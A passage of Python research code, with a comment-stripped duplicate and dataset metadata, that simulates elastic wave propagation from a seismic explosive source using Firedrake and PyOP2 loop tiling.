the velocity equation. """ f = -inner(grad(w), s0)*dx + inner(avg(s0)*n('+'), w('+'))*dS + inner(avg(s0)*n('-'), w('-'))*dS if(absorption): f += -inner(w, absorption*u0)*dx return f def g(self, v, u1, I, n, l, mu, source=None): """ The RHS of the stress equation. """ g = - l*(v[i, j]*I[i, j]).dx(k)*u1[k]*dx + l*(jump(v[i, j], n[k])*I[i, j]*avg(u1[k]))*dS + l*(v[i, j]*I[i, j]*u1[k]*n[k])*ds - mu*inner(div(v), u1)*dx + mu*inner(avg(u1), jump(v, n))*dS - mu*inner(div(v.T), u1)*dx + mu*inner(avg(u1), jump(v.T, n))*dS + mu*inner(u1, dot(v, n))*ds + mu*inner(u1, dot(v.T, n))*ds if(source): g += inner(v, source)*dx return g def ast_matmul(self, F_a, implementation='optimized'): """Generate an AST for a PyOP2 kernel performing a matrix-vector multiplication.""" # The number of dofs on each element is /ndofs*cdim/ F_a_fs = F_a.function_space() ndofs = F_a_fs.fiat_element.entity_dofs() ndofs = sum(self.mesh.make_dofs_per_plex_entity(ndofs)) cdim = F_a_fs.dim name = 'mat_vec_mul_kernel_%s' % F_a_fs.name identifier = (ndofs, cdim, name, implementation) if identifier in self.asts: return self.asts[identifier] from coffee import isa, options if cdim and cdim % isa['dp_reg'] == 0: simd_pragma = '#pragma simd reduction(+:sum)' else: simd_pragma = '' # Craft the AST if implementation == 'optimized' and cdim >= 4: body = ast.Incr(ast.Symbol('sum'), ast.Prod(ast.Symbol('A', ('i',), ((ndofs*cdim, 'j*%d + k' % cdim),)), ast.Symbol('B', ('j', 'k')))) body = ast.c_for('k', cdim, body, simd_pragma).children[0] body = [ast.Decl('const int', ast.Symbol('index'), init=ast.Symbol('i%%%d' % cdim)), ast.Decl('double', ast.Symbol('sum'), init=ast.Symbol('0.0')), ast.c_for('j', ndofs, body).children[0], ast.Assign(ast.Symbol('C', ('i/%d' % cdim, 'index')), 'sum')] body = ast.Block([ast.c_for('i', ndofs*cdim, body).children[0]]) funargs = [ast.Decl('double* restrict', 'A'), ast.Decl('double *restrict *restrict', 'B'), ast.Decl('double *restrict *', 'C')] fundecl = ast.FunDecl('void', name, funargs, body, ['static', 'inline']) else: body = ast.Incr(ast.Symbol('C', ('i/%d' % cdim, 'index')), ast.Prod(ast.Symbol('A', ('i',), ((ndofs*cdim, 'j*%d + k' % cdim),)), ast.Symbol('B', ('j', 'k')))) body = ast.c_for('k', cdim, body).children[0] body = [ast.Decl('const int', ast.Symbol('index'), init=ast.Symbol('i%%%d' % cdim)), ast.Assign(ast.Symbol('C', ('i/%d' % cdim, 'index' % cdim)), '0.0'), ast.c_for('j', ndofs, body).children[0]] body = ast.Block([ast.c_for('i', ndofs*cdim, body).children[0]]) funargs = [ast.Decl('double* restrict', 'A'), ast.Decl('double *restrict *restrict', 'B'), ast.Decl('double *restrict *', 'C')] fundecl = ast.FunDecl('void', name, funargs, body, ['static', 'inline']) # Track the AST for later fast retrieval self.asts[identifier] = fundecl return fundecl def solve(self, rhs, matrix_asdat, result): F_a = assemble(rhs) ast_matmul = self.ast_matmul(F_a) # Create the par loop (automatically added to the trace of loops to be executed) kernel = op2.Kernel(ast_matmul, ast_matmul.name) op2.par_loop(kernel, self.mesh.cell_set, matrix_asdat(op2.READ), F_a.dat(op2.READ, F_a.cell_node_map()), result.dat(op2.WRITE, result.cell_node_map())) def write(self, u=None, s=None, output=True): r""" Write the velocity and/or stress fields to file. :param firedrake.Function u: The velocity field. :param firedrake.Function s: The stress field. :returns: None """ _trace.evaluate_all() if output: with timed_region('i/o'): if(u): self.u_stream.write(u) if(s): # FIXME: Cannot currently write tensor valued fields to a VTU file. # See https://github.com/firedrakeproject/firedrake/issues/538 #self.s_stream << s pass def run(self, T, TS=0): """ Run the elastic wave simulation until t = T or ntimesteps = TS. :param float T: The finish time of the simulation. :param float TS: The maximum number of timesteps performed; ignored if = 0. :returns: The final solution fields for velocity and stress. """ # Write out the initial condition. self.write(self.u1, self.s1, self.tofile) info("Generating inverse mass matrix") # Pre-assemble the inverse mass matrices, which should stay # constant throughout the simulation (assuming no mesh adaptivity). start = time() self.assemble_inverse_mass() end = time() info("DONE! (Elapsed: %f s)" % round(end - start, 3)) op2.MPI.COMM_WORLD.barrier() info("Copying inverse mass matrix into a dat...") start = time() self.copy_massmatrix_into_dat() end = time() info("DONE! (Elapsed: %f s)" % round(end - start, 3)) op2.MPI.COMM_WORLD.barrier() start = time() t = self.dt timestep = 0 ntimesteps = sys.maxint if TS == 0 else TS while t <= T + 1e-12 and timestep < ntimesteps: if op2.MPI.COMM_WORLD.rank == 0 and timestep % self.output == 0: info("t = %f, (timestep = %d)" % (t, timestep)) with loop_chain("main1", tile_size=self.tiling_size, num_unroll=self.tiling_uf, mode=self.tiling_mode, extra_halo=self.tiling_halo, explicit=self.tiling_explicit, use_glb_maps=self.tiling_glb_maps, use_prefetch=self.tiling_prefetch, coloring=self.tiling_coloring, ignore_war=True, log=self.tiling_log): # In case the source is time-dependent, update the time 't' here. if(self.source): with timed_region('source term update'): self.source_expression.t = t self.source = self.source_expression # Solve for the velocity vector field. self.solve(self.rhs_uh1, self.velocity_mass_asdat, self.uh1) self.solve(self.rhs_stemp, self.stress_mass_asdat, self.stemp) self.solve(self.rhs_uh2, self.velocity_mass_asdat, self.uh2) self.solve(self.rhs_u1, self.velocity_mass_asdat, self.u1) # Solve for the stress tensor field. self.solve(self.rhs_sh1, self.stress_mass_asdat, self.sh1) self.solve(self.rhs_utemp, self.velocity_mass_asdat, self.utemp) self.solve(self.rhs_sh2, self.stress_mass_asdat, self.sh2) self.solve(self.rhs_s1, self.stress_mass_asdat, self.s1) self.u0.assign(self.u1) self.s0.assign(self.s1) # Write out the new fields self.write(self.u1, self.s1, self.tofile and timestep % self.output == 0) # Move onto next timestep t += self.dt timestep += 1 # Write out the final state of the fields self.write(self.u1, self.s1, self.tofile) end = time() return start, end, timestep, self.u1, self.s1 # Helper stuff def Vp(mu, l, density): r""" Calculate the P-wave velocity, given by .. math:: \sqrt{\frac{(\lambda + 2\mu)}{\rho}} where :math:`\rho` is the density, and :math:`\lambda` and :math:`\mu` are the first and second Lame parameters, respectively. :param mu: The second Lame parameter. :param l: The first Lame parameter. :param density: The density. :returns: The P-wave velocity. :rtype: float """ return sqrt((l + 2*mu)/density) def Vs(mu, density): r""" Calculate the S-wave velocity, given by .. math:: \sqrt{\frac{\mu}{\rho}} where :math:`\rho` is the density, and :math:`\mu` is the second Lame parameter. :param mu: The second Lame parameter. :param density: The density. :returns: The P-wave velocity. :rtype: float """ return sqrt(mu/density) def cfl_dt(dx, Vp, courant_number): r""" Computes the maximum permitted value for the timestep math:`\delta t`. :param float dx: The characteristic element length. :param float Vp: The P-wave velocity. :param float courant_number: The desired Courant number :returns: The maximum permitted timestep, math:`\delta t`. :rtype: float """ return (courant_number*dx)/Vp class ExplosiveSourceLF4(object): def explosive_source_lf4(self, T=2.5, TS=0, Lx=300.0, Ly=150.0, h=2.5, cn=0.05, mesh_file=None, output=1, poly_order=2, params=None): tile_size = params['tile_size'] num_unroll = params['num_unroll'] extra_halo = params['extra_halo'] part_mode = params['partitioning'] explicit_mode = params['explicit_mode'] if explicit_mode: fusion_scheme = FusionSchemes.get(explicit_mode, part_mode, tile_size) num_solves, params['explicit_mode'] = fusion_scheme else: num_solves = ElasticLF4.num_solves if mesh_file: mesh = Mesh(mesh_file) else: mesh = RectangleMesh(int(Lx/h), int(Ly/h), Lx, Ly) set_log_level(INFO) kwargs = {} if params['mode'] in ['tile', 'only_tile']: s_depth = calculate_sdepth(num_solves, num_unroll, extra_halo) if part_mode == 'metis': kwargs['reorder'] = ('metis-rcm', mesh.num_cells() / tile_size) else: s_depth = 1 # FIXME: need s_depth in firedrake to be able to use this # kwargs['s_depth'] = s_depth params['s_depth'] = s_depth mesh.topology.init(**kwargs) slope(mesh, debug=True) # Instantiate the model self.elastic = ElasticLF4(mesh, "DG", poly_order, 2, output, params) info("S-depth used: %d" % s_depth) info("Polynomial order: %d" % poly_order) # Constants self.elastic.density = 1.0 self.elastic.mu = 3600.0 self.elastic.l = 3599.3664 self.Vp = Vp(self.elastic.mu, self.elastic.l, self.elastic.density) self.Vs = Vs(self.elastic.mu, self.elastic.density) info("P-wave velocity: %f" % self.Vp) info("S-wave velocity: %f" % self.Vs) self.dx = h self.courant_number = cn self.elastic.dt = cfl_dt(self.dx, self.Vp, self.courant_number) info("Using a timestep of %f" % self.elastic.dt) # Source exp_area = (44.5, 45.5, Ly - 1.5, Ly - 0.5) if poly_order == 1: # Adjust explosion area exp_area = (149.5, 150.5, Ly - 1.5, Ly - 0.5) a = 159.42 self.elastic.source_expression = Expression((("x[0] >= %f && x[0] <= %f && x[1] >= %f && x[1] <= %f ? (-1.0 + 2*a*pow(t - 0.3, 2))*exp(-a*pow(t - 0.3, 2)) : 0.0" % exp_area, "0.0"), ("0.0", "x[0] >= %f && x[0] <= %f && x[1] >= %f && x[1] <= %f ? (-1.0 + 2*a*pow(t - 0.3, 2))*exp(-a*pow(t - 0.3, 2)) : 0.0" % exp_area)), a=a, t=0) self.elastic.source_function = Function(self.elastic.S) self.elastic.source = self.elastic.source_expression # Absorption F = FunctionSpace(mesh, "DG", poly_order, name='F') self.elastic.absorption_function = Function(F) self.elastic.absorption = Expression("x[0] <= 20 || x[0] >= %f || x[1] <= 20.0 ? 1000 : 0" % (Lx - 20,)) # Initial conditions uic = Expression(('0.0', '0.0')) self.elastic.u0.assign(Function(self.elastic.U).interpolate(uic)) sic = Expression((('0', '0'), ('0', '0'))) self.elastic.s0.assign(Function(self.elastic.S).interpolate(sic)) # Run the simulation start, end, ntimesteps, u1, s1 = self.elastic.run(T, TS=TS) # Print runtime summary output_time(start, end, tofile=params['tofile'], verbose=params['verbose'], meshid=("h%s" % h).replace('.', ''), ntimesteps=ntimesteps, nloops=ElasticLF4.loop_chain_length*num_unroll, partitioning=part_mode, tile_size=tile_size, extra_halo=extra_halo, explicit_mode=explicit_mode, glb_maps=params['use_glb_maps'], prefetch=params['use_prefetch'], coloring=params['coloring'], poly_order=poly_order, domain=os.path.splitext(os.path.basename(mesh.name))[0], function_spaces=[self.elastic.S, self.elastic.U]) return u1, s1 if __name__ == '__main__': set_log_level(INFO) # Parse the input args = parser() params = { 'num_unroll': args.num_unroll, 'tile_size': args.tile_size, 'mode': args.fusion_mode, 'partitioning': args.part_mode, 'coloring': args.coloring, 'extra_halo': args.extra_halo, 'explicit_mode': args.explicit_mode, 'explicit_mode_id': args.explicit_mode, 'use_glb_maps': args.glb_maps, 'use_prefetch': args.prefetch, 'log': args.log, 'tofile': args.tofile, 'verbose': args.verbose } # Set the kernel optimizaation level (default: O2) parameters['coffee']['optlevel'] = args.coffee_opt # Is it just a run to check correctness? if args.check: Lx, Ly, h, time_max, tolerance = 20, 20, 2.5, 0.01, 1e-10 info("Checking correctness of original and tiled versions, with:") info(" (Lx, Ly, T, tolerance)=%s" % str((Lx, Ly, time_max, tolerance))) info(" %s" % params) # Run the tiled variant u1, s1 = ExplosiveSourceLF4().explosive_source_lf4(time_max, Lx, Ly, h, sys.maxint, params) # Run the original code original = {'num_unroll': 0, 'tile_size': 0, 'mode': None, 'partitioning': 'chunk', 'extra_halo': 0} u1_orig, s1_orig = ExplosiveSourceLF4().explosive_source_lf4(time_max, Lx, Ly, h, sys.maxint, original) # Check output info("Checking output...") assert np.allclose(u1.dat.data, u1_orig.dat.data, rtol=1e-10) assert np.allclose(s1.dat.data, s1_orig.dat.data, rtol=1e-10) info("Results OK!") sys.exit(0) # Set the input mesh if args.mesh_file: info("Using the unstructured mesh %s" % args.mesh_file) kwargs = {'T': args.time_max, 'TS': args.timesteps_max, 'mesh_file': args.mesh_file, 'h': args.ms, 'cn': args.cn, 'output': args.output, 'poly_order': args.poly_order, 'params': params} else: Lx, Ly = eval(args.mesh_size) info("Using the structured mesh with values (Lx,Ly,h)=%s" % str((Lx, Ly, args.ms))) kwargs = {'T': args.time_max, 'TS': args.timesteps_max, 'Lx': Lx, 'Ly': Ly, 'h': args.ms, 'output': args.output, 'poly_order': args.poly_order, 'params': params} info("h=%f, courant number=%f" % (args.ms, args.cn)) if args.profile: cProfile.run('ExplosiveSourceLF4().explosive_source_lf4(**kwargs)', 'log_rank%d.cprofile' % op2.MPI.COMM_WORLD.rank) else: u1, s1 = ExplosiveSourceLF4().explosive_source_lf4(**kwargs)
40.683748
318
0.575557
from math import * import mpi4py import numpy as np from time import time import sys import os import cProfile from firedrake import * from firedrake.petsc import PETSc from pyop2.utils import cached_property from pyop2.profiling import timed_region from pyop2.base import _trace, Dat, DataSet from pyop2.fusion.interface import loop_chain from pyop2.logger import info, set_log_level, INFO import coffee.base as ast from utils import parser, output_time, calculate_sdepth, FusionSchemes class ElasticLF4(object): loop_chain_length = 28 num_solves = 8 def __init__(self, mesh, family, degree, dimension, output=1, params=None): self.degree = degree self.mesh = mesh self.dimension = dimension self.output = output self.tofile = params['tofile'] self.S = TensorFunctionSpace(mesh, family, degree, name='S') self.U = VectorFunctionSpace(mesh, family, degree, name='U') self.S_tot_dofs = op2.MPI.COMM_WORLD.allreduce(self.S.dof_count, op=mpi4py.MPI.SUM) self.U_tot_dofs = op2.MPI.COMM_WORLD.allreduce(self.U.dof_count, op=mpi4py.MPI.SUM) info("Number of degrees of freedom (Velocity): %d" % self.U_tot_dofs) info("Number of degrees of freedom (Stress): %d" % self.S_tot_dofs) self.s = TrialFunction(self.S) self.v = TestFunction(self.S) self.u = TrialFunction(self.U) self.w = TestFunction(self.U) self.s0 = Function(self.S, name="StressOld") self.sh1 = Function(self.S, name="StressHalf1") self.stemp = Function(self.S, name="StressTemp") self.sh2 = Function(self.S, name="StressHalf2") self.s1 = Function(self.S, name="StressNew") self.u0 = Function(self.U, name="VelocityOld") self.uh1 = Function(self.U, name="VelocityHalf1") self.utemp = Function(self.U, name="VelocityTemp") self.uh2 = Function(self.U, name="VelocityHalf2") self.u1 = Function(self.U, name="VelocityNew") self.absorption_function = None self.source_function = None self.source_expression = None self._dt = None self._density = None self._mu = None self._l = None self.n = FacetNormal(self.mesh) self.I = Identity(self.dimension) self.tiling_size = params['tile_size'] self.tiling_uf = params['num_unroll'] self.tiling_mode = params['mode'] self.tiling_halo = params['extra_halo'] self.tiling_explicit = params['explicit_mode'] self.tiling_explicit_id = params['explicit_mode_id'] self.tiling_log = params['log'] self.tiling_sdepth = params['s_depth'] self.tiling_part = params['partitioning'] self.tiling_coloring = params['coloring'] self.tiling_glb_maps = params['use_glb_maps'] self.tiling_prefetch = params['use_prefetch'] self.asts = {} if self.tofile: platform = os.environ.get('NODENAME', 'unknown') tmpdir = os.environ['TMPDIR'] base = os.path.join(tmpdir, 'output', platform, 'p%d' % self.degree, 'uf%d' % self.tiling_uf) if op2.MPI.COMM_WORLD.rank == 0: if not os.path.exists(base): os.makedirs(base) sub_dirs = [d for d in os.listdir(base) if os.path.isdir(os.path.join(base, d))] sub_dir = "%d_em%d_part%s_tile%s" % (len(sub_dirs), self.tiling_explicit_id, self.tiling_size if self.tiling_uf else 0, self.tiling_part if self.tiling_uf else 'None') base = os.path.join(base, sub_dir) os.makedirs(base) op2.MPI.COMM_WORLD.barrier() base = op2.MPI.COMM_WORLD.bcast(base, root=0) self.u_stream = File(os.path.join(base, 'velocity.pvd')) self.s_stream = File(os.path.join(base, 'stress.pvd')) @property def absorption(self): return self.absorption_function @absorption.setter def absorption(self, expression): self.absorption_function.interpolate(expression) @property def source(self): return self.source_function @source.setter def source(self, expression): self.source_function.interpolate(expression) def assemble_inverse_mass(self): self.inverse_mass_velocity = assemble(inner(self.w, self.u)*dx, inverse=True) self.inverse_mass_velocity.assemble() self.imass_velocity = self.inverse_mass_velocity.M self.inverse_mass_stress = assemble(inner(self.v, self.s)*dx, inverse=True) self.inverse_mass_stress.assemble() self.imass_stress = self.inverse_mass_stress.M def copy_massmatrix_into_dat(self): vmat = self.imass_velocity.handle dofs_per_entity = self.U.fiat_element.entity_dofs() dofs_per_entity = sum(self.mesh.make_dofs_per_plex_entity(dofs_per_entity)) arity = dofs_per_entity*self.U.topological.dim self.velocity_mass_asdat = Dat(DataSet(self.mesh.cell_set, arity*arity), dtype='double') istart, iend = vmat.getOwnershipRange() idxs = [PETSc.IS().createGeneral(np.arange(i, i+arity, dtype=np.int32), comm=PETSc.COMM_SELF) for i in range(istart, iend, arity)] submats = vmat.getSubMatrices(idxs, idxs) for i, m in enumerate(submats): self.velocity_mass_asdat.data[i] = m[:, :].flatten() info("Computed velocity mass matrix") smat = self.imass_stress.handle dofs_per_entity = self.S.fiat_element.entity_dofs() dofs_per_entity = sum(self.mesh.make_dofs_per_plex_entity(dofs_per_entity)) arity = dofs_per_entity*self.S.topological.dim self.stress_mass_asdat = Dat(DataSet(self.mesh.cell_set, arity*arity), dtype='double') istart, iend = smat.getOwnershipRange() idxs = [PETSc.IS().createGeneral(np.arange(i, i+arity, dtype=np.int32), comm=PETSc.COMM_SELF) for i in range(istart, iend, arity)] submats = smat.getSubMatrices(idxs, idxs) for i, m in enumerate(submats): self.stress_mass_asdat.data[i] = m[:, :].flatten() info("Computed stress mass matrix") @property def form_uh1(self): F = inner(self.w, self.u)*dx - self.f(self.w, self.s0, self.u0, self.n, self.absorption) return F @cached_property def rhs_uh1(self): return rhs(self.form_uh1) @property def form_stemp(self): F = inner(self.v, self.s)*dx - self.g(self.v, self.uh1, self.I, self.n, self.l, self.mu, self.source) return F @cached_property def rhs_stemp(self): return rhs(self.form_stemp) @property def form_uh2(self): F = inner(self.w, self.u)*dx - self.f(self.w, self.stemp, self.u0, self.n, self.absorption) return F @cached_property def rhs_uh2(self): return rhs(self.form_uh2) @property def form_u1(self): F = self.density*inner(self.w, self.u)*dx - self.density*inner(self.w, self.u0)*dx - self.dt*inner(self.w, self.uh1)*dx - ((self.dt**3)/24.0)*inner(self.w, self.uh2)*dx return F @cached_property def rhs_u1(self): return rhs(self.form_u1) @property def form_sh1(self): F = inner(self.v, self.s)*dx - self.g(self.v, self.u1, self.I, self.n, self.l, self.mu, self.source) return F @cached_property def rhs_sh1(self): return rhs(self.form_sh1) @property def form_utemp(self): F = inner(self.w, self.u)*dx - self.f(self.w, self.sh1, self.u1, self.n, self.absorption) return F @cached_property def rhs_utemp(self): return rhs(self.form_utemp) @property def form_sh2(self): F = inner(self.v, self.s)*dx - self.g(self.v, self.utemp, self.I, self.n, self.l, self.mu, self.source) return F @cached_property def rhs_sh2(self): return rhs(self.form_sh2) @property def form_s1(self): F = inner(self.v, self.s)*dx - inner(self.v, self.s0)*dx - self.dt*inner(self.v, self.sh1)*dx - ((self.dt**3)/24.0)*inner(self.v, self.sh2)*dx return F @cached_property def rhs_s1(self): return rhs(self.form_s1) def f(self, w, s0, u0, n, absorption=None): f = -inner(grad(w), s0)*dx + inner(avg(s0)*n('+'), w('+'))*dS + inner(avg(s0)*n('-'), w('-'))*dS if(absorption): f += -inner(w, absorption*u0)*dx return f def g(self, v, u1, I, n, l, mu, source=None): g = - l*(v[i, j]*I[i, j]).dx(k)*u1[k]*dx + l*(jump(v[i, j], n[k])*I[i, j]*avg(u1[k]))*dS + l*(v[i, j]*I[i, j]*u1[k]*n[k])*ds - mu*inner(div(v), u1)*dx + mu*inner(avg(u1), jump(v, n))*dS - mu*inner(div(v.T), u1)*dx + mu*inner(avg(u1), jump(v.T, n))*dS + mu*inner(u1, dot(v, n))*ds + mu*inner(u1, dot(v.T, n))*ds if(source): g += inner(v, source)*dx return g def ast_matmul(self, F_a, implementation='optimized'): F_a_fs = F_a.function_space() ndofs = F_a_fs.fiat_element.entity_dofs() ndofs = sum(self.mesh.make_dofs_per_plex_entity(ndofs)) cdim = F_a_fs.dim name = 'mat_vec_mul_kernel_%s' % F_a_fs.name identifier = (ndofs, cdim, name, implementation) if identifier in self.asts: return self.asts[identifier] from coffee import isa, options if cdim and cdim % isa['dp_reg'] == 0: simd_pragma = '#pragma simd reduction(+:sum)' else: simd_pragma = '' if implementation == 'optimized' and cdim >= 4: body = ast.Incr(ast.Symbol('sum'), ast.Prod(ast.Symbol('A', ('i',), ((ndofs*cdim, 'j*%d + k' % cdim),)), ast.Symbol('B', ('j', 'k')))) body = ast.c_for('k', cdim, body, simd_pragma).children[0] body = [ast.Decl('const int', ast.Symbol('index'), init=ast.Symbol('i%%%d' % cdim)), ast.Decl('double', ast.Symbol('sum'), init=ast.Symbol('0.0')), ast.c_for('j', ndofs, body).children[0], ast.Assign(ast.Symbol('C', ('i/%d' % cdim, 'index')), 'sum')] body = ast.Block([ast.c_for('i', ndofs*cdim, body).children[0]]) funargs = [ast.Decl('double* restrict', 'A'), ast.Decl('double *restrict *restrict', 'B'), ast.Decl('double *restrict *', 'C')] fundecl = ast.FunDecl('void', name, funargs, body, ['static', 'inline']) else: body = ast.Incr(ast.Symbol('C', ('i/%d' % cdim, 'index')), ast.Prod(ast.Symbol('A', ('i',), ((ndofs*cdim, 'j*%d + k' % cdim),)), ast.Symbol('B', ('j', 'k')))) body = ast.c_for('k', cdim, body).children[0] body = [ast.Decl('const int', ast.Symbol('index'), init=ast.Symbol('i%%%d' % cdim)), ast.Assign(ast.Symbol('C', ('i/%d' % cdim, 'index' % cdim)), '0.0'), ast.c_for('j', ndofs, body).children[0]] body = ast.Block([ast.c_for('i', ndofs*cdim, body).children[0]]) funargs = [ast.Decl('double* restrict', 'A'), ast.Decl('double *restrict *restrict', 'B'), ast.Decl('double *restrict *', 'C')] fundecl = ast.FunDecl('void', name, funargs, body, ['static', 'inline']) self.asts[identifier] = fundecl return fundecl def solve(self, rhs, matrix_asdat, result): F_a = assemble(rhs) ast_matmul = self.ast_matmul(F_a) kernel = op2.Kernel(ast_matmul, ast_matmul.name) op2.par_loop(kernel, self.mesh.cell_set, matrix_asdat(op2.READ), F_a.dat(op2.READ, F_a.cell_node_map()), result.dat(op2.WRITE, result.cell_node_map())) def write(self, u=None, s=None, output=True): _trace.evaluate_all() if output: with timed_region('i/o'): if(u): self.u_stream.write(u) if(s): pass def run(self, T, TS=0): self.write(self.u1, self.s1, self.tofile) info("Generating inverse mass matrix") start = time() self.assemble_inverse_mass() end = time() info("DONE! (Elapsed: %f s)" % round(end - start, 3)) op2.MPI.COMM_WORLD.barrier() info("Copying inverse mass matrix into a dat...") start = time() self.copy_massmatrix_into_dat() end = time() info("DONE! (Elapsed: %f s)" % round(end - start, 3)) op2.MPI.COMM_WORLD.barrier() start = time() t = self.dt timestep = 0 ntimesteps = sys.maxint if TS == 0 else TS while t <= T + 1e-12 and timestep < ntimesteps: if op2.MPI.COMM_WORLD.rank == 0 and timestep % self.output == 0: info("t = %f, (timestep = %d)" % (t, timestep)) with loop_chain("main1", tile_size=self.tiling_size, num_unroll=self.tiling_uf, mode=self.tiling_mode, extra_halo=self.tiling_halo, explicit=self.tiling_explicit, use_glb_maps=self.tiling_glb_maps, use_prefetch=self.tiling_prefetch, coloring=self.tiling_coloring, ignore_war=True, log=self.tiling_log): if(self.source): with timed_region('source term update'): self.source_expression.t = t self.source = self.source_expression self.solve(self.rhs_uh1, self.velocity_mass_asdat, self.uh1) self.solve(self.rhs_stemp, self.stress_mass_asdat, self.stemp) self.solve(self.rhs_uh2, self.velocity_mass_asdat, self.uh2) self.solve(self.rhs_u1, self.velocity_mass_asdat, self.u1) self.solve(self.rhs_sh1, self.stress_mass_asdat, self.sh1) self.solve(self.rhs_utemp, self.velocity_mass_asdat, self.utemp) self.solve(self.rhs_sh2, self.stress_mass_asdat, self.sh2) self.solve(self.rhs_s1, self.stress_mass_asdat, self.s1) self.u0.assign(self.u1) self.s0.assign(self.s1) self.write(self.u1, self.s1, self.tofile and timestep % self.output == 0) t += self.dt timestep += 1 self.write(self.u1, self.s1, self.tofile) end = time() return start, end, timestep, self.u1, self.s1 def Vp(mu, l, density): return sqrt((l + 2*mu)/density) def Vs(mu, density): return sqrt(mu/density) def cfl_dt(dx, Vp, courant_number): return (courant_number*dx)/Vp class ExplosiveSourceLF4(object): def explosive_source_lf4(self, T=2.5, TS=0, Lx=300.0, Ly=150.0, h=2.5, cn=0.05, mesh_file=None, output=1, poly_order=2, params=None): tile_size = params['tile_size'] num_unroll = params['num_unroll'] extra_halo = params['extra_halo'] part_mode = params['partitioning'] explicit_mode = params['explicit_mode'] if explicit_mode: fusion_scheme = FusionSchemes.get(explicit_mode, part_mode, tile_size) num_solves, params['explicit_mode'] = fusion_scheme else: num_solves = ElasticLF4.num_solves if mesh_file: mesh = Mesh(mesh_file) else: mesh = RectangleMesh(int(Lx/h), int(Ly/h), Lx, Ly) set_log_level(INFO) kwargs = {} if params['mode'] in ['tile', 'only_tile']: s_depth = calculate_sdepth(num_solves, num_unroll, extra_halo) if part_mode == 'metis': kwargs['reorder'] = ('metis-rcm', mesh.num_cells() / tile_size) else: s_depth = 1 params['s_depth'] = s_depth mesh.topology.init(**kwargs) slope(mesh, debug=True) self.elastic = ElasticLF4(mesh, "DG", poly_order, 2, output, params) info("S-depth used: %d" % s_depth) info("Polynomial order: %d" % poly_order) self.elastic.density = 1.0 self.elastic.mu = 3600.0 self.elastic.l = 3599.3664 self.Vp = Vp(self.elastic.mu, self.elastic.l, self.elastic.density) self.Vs = Vs(self.elastic.mu, self.elastic.density) info("P-wave velocity: %f" % self.Vp) info("S-wave velocity: %f" % self.Vs) self.dx = h self.courant_number = cn self.elastic.dt = cfl_dt(self.dx, self.Vp, self.courant_number) info("Using a timestep of %f" % self.elastic.dt) exp_area = (44.5, 45.5, Ly - 1.5, Ly - 0.5) if poly_order == 1: exp_area = (149.5, 150.5, Ly - 1.5, Ly - 0.5) a = 159.42 self.elastic.source_expression = Expression((("x[0] >= %f && x[0] <= %f && x[1] >= %f && x[1] <= %f ? (-1.0 + 2*a*pow(t - 0.3, 2))*exp(-a*pow(t - 0.3, 2)) : 0.0" % exp_area, "0.0"), ("0.0", "x[0] >= %f && x[0] <= %f && x[1] >= %f && x[1] <= %f ? (-1.0 + 2*a*pow(t - 0.3, 2))*exp(-a*pow(t - 0.3, 2)) : 0.0" % exp_area)), a=a, t=0) self.elastic.source_function = Function(self.elastic.S) self.elastic.source = self.elastic.source_expression F = FunctionSpace(mesh, "DG", poly_order, name='F') self.elastic.absorption_function = Function(F) self.elastic.absorption = Expression("x[0] <= 20 || x[0] >= %f || x[1] <= 20.0 ? 1000 : 0" % (Lx - 20,)) uic = Expression(('0.0', '0.0')) self.elastic.u0.assign(Function(self.elastic.U).interpolate(uic)) sic = Expression((('0', '0'), ('0', '0'))) self.elastic.s0.assign(Function(self.elastic.S).interpolate(sic)) start, end, ntimesteps, u1, s1 = self.elastic.run(T, TS=TS) output_time(start, end, tofile=params['tofile'], verbose=params['verbose'], meshid=("h%s" % h).replace('.', ''), ntimesteps=ntimesteps, nloops=ElasticLF4.loop_chain_length*num_unroll, partitioning=part_mode, tile_size=tile_size, extra_halo=extra_halo, explicit_mode=explicit_mode, glb_maps=params['use_glb_maps'], prefetch=params['use_prefetch'], coloring=params['coloring'], poly_order=poly_order, domain=os.path.splitext(os.path.basename(mesh.name))[0], function_spaces=[self.elastic.S, self.elastic.U]) return u1, s1 if __name__ == '__main__': set_log_level(INFO) args = parser() params = { 'num_unroll': args.num_unroll, 'tile_size': args.tile_size, 'mode': args.fusion_mode, 'partitioning': args.part_mode, 'coloring': args.coloring, 'extra_halo': args.extra_halo, 'explicit_mode': args.explicit_mode, 'explicit_mode_id': args.explicit_mode, 'use_glb_maps': args.glb_maps, 'use_prefetch': args.prefetch, 'log': args.log, 'tofile': args.tofile, 'verbose': args.verbose } parameters['coffee']['optlevel'] = args.coffee_opt if args.check: Lx, Ly, h, time_max, tolerance = 20, 20, 2.5, 0.01, 1e-10 info("Checking correctness of original and tiled versions, with:") info(" (Lx, Ly, T, tolerance)=%s" % str((Lx, Ly, time_max, tolerance))) info(" %s" % params) u1, s1 = ExplosiveSourceLF4().explosive_source_lf4(time_max, Lx, Ly, h, sys.maxint, params) original = {'num_unroll': 0, 'tile_size': 0, 'mode': None, 'partitioning': 'chunk', 'extra_halo': 0} u1_orig, s1_orig = ExplosiveSourceLF4().explosive_source_lf4(time_max, Lx, Ly, h, sys.maxint, original) info("Checking output...") assert np.allclose(u1.dat.data, u1_orig.dat.data, rtol=1e-10) assert np.allclose(s1.dat.data, s1_orig.dat.data, rtol=1e-10) info("Results OK!") sys.exit(0) if args.mesh_file: info("Using the unstructured mesh %s" % args.mesh_file) kwargs = {'T': args.time_max, 'TS': args.timesteps_max, 'mesh_file': args.mesh_file, 'h': args.ms, 'cn': args.cn, 'output': args.output, 'poly_order': args.poly_order, 'params': params} else: Lx, Ly = eval(args.mesh_size) info("Using the structured mesh with values (Lx,Ly,h)=%s" % str((Lx, Ly, args.ms))) kwargs = {'T': args.time_max, 'TS': args.timesteps_max, 'Lx': Lx, 'Ly': Ly, 'h': args.ms, 'output': args.output, 'poly_order': args.poly_order, 'params': params} info("h=%f, courant number=%f" % (args.ms, args.cn)) if args.profile: cProfile.run('ExplosiveSourceLF4().explosive_source_lf4(**kwargs)', 'log_rank%d.cprofile' % op2.MPI.COMM_WORLD.rank) else: u1, s1 = ExplosiveSourceLF4().explosive_source_lf4(**kwargs)
true
true
f728d2d5b0214e9814e6ffac8ee3bd2b253d502e
1,789
py
Python
src/test/parser/template/graph/test_basics.py
ajit2688/program-y-chatbot
f0a7eb33be2ec8de630644a6393296ddd2576eee
[ "MIT" ]
null
null
null
src/test/parser/template/graph/test_basics.py
ajit2688/program-y-chatbot
f0a7eb33be2ec8de630644a6393296ddd2576eee
[ "MIT" ]
null
null
null
src/test/parser/template/graph/test_basics.py
ajit2688/program-y-chatbot
